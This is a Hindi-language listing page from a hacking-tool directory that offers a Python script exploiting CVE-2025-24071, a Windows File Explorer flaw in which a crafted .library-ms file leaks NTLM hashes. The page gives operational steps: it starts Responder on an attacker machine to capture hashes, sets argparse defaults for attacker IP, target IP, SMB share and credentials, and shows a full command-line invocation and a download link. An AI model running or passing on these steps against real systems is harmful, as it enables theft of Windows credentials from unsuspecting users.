Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24071 — CVE-2025-24071 को निष्पादित करने के लिए Python स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/ac8999/cve-2025-24071
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubac8999/cve-2025-24071

CVE-2025-24071

CVE-2025-24071 को निष्पादित करने के लिए Python स्क्रिप्ट

रिपॉजिटरी देखें
141 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24071: Microsoft Windows File Explorer स्पूफ़िंग भेद्यता (SilentExploit द्वारा स्क्रिप्ट)

📖 विवरण

यह परियोजना एक Windows File Explorer स्पूफ़िंग भेद्यता का पता लगाती है और शोषण प्रदर्शित करती है।

समस्या एक Windows लाइब्रेरी फ़ाइल (.library-ms) से उत्पन्न होती है जिसमें एक नेटवर्क पथ होता है, या तो प्रत्यक्ष अनुलग्नक के रूप में या आर्काइव में एम्बेडेड होता है।
खोले जाने पर, फ़ाइल Windows को किसी दूरस्थ (संभावित रूप से दुर्भावनापूर्ण) नेटवर्क स्थान पर एनटीएलएम हैश लीक करने का कारण बन सकती है।

POC: https://imgur.com/a/hEO83Se

⚡ उपयोग

1. रिस्पॉन्डर प्रारंभ करें

अपने आक्रमण मशीन पर, एनटीएलएम हैश कैप्चर करने के लिए Responder चलाएँ:

root@kitploit:~
sudo responder -I tun0 -wvF
  1. स्क्रिप्ट चलाएँ

आप स्क्रिप्ट को दो तरीकों से कॉन्फ़िगर कर सकते हैं:

✅ विकल्प A: डिफ़ॉल्ट संपादित करें (सबसे आसान)

स्क्रिप्ट में सीधे डिफ़ॉल्ट पैरामीटर संशोधित करें।

root@kitploit:~
    parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP")      #your IP
    parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP")         #target IP 
    parser.add_argument("--share-name", default="IT", help="SMB share name")               #name of the share you have access to without the /
    parser.add_argument("--username", default="USERNAME", help="SMB username")          #username  of the share owner 
    parser.add_argument("--password", default="PASSWORD", help="SMB password")        #password of the share owner 
    parser.add_argument("--interface", default="tun0", help="Responder network interface")        #check ifconfig but tun0 will work if you're on a vpn
    return parser.parse_args()

✅ विकल्प B: CLI पैरामीटर के साथ चलाएँ

तर्कों के साथ निष्पादित करें:

root@kitploit:~
python3 CVE-2025-24071.py \
    --attacker-ip <ATTACKER_IP> \
    --target-ip <TARGET_IP> \
    --share-name <SHARE_NAME> \
    --username <USERNAME> \
    --password <PASSWORD> \
    --interface <INTERFACE>
टूल डाउनलोड करें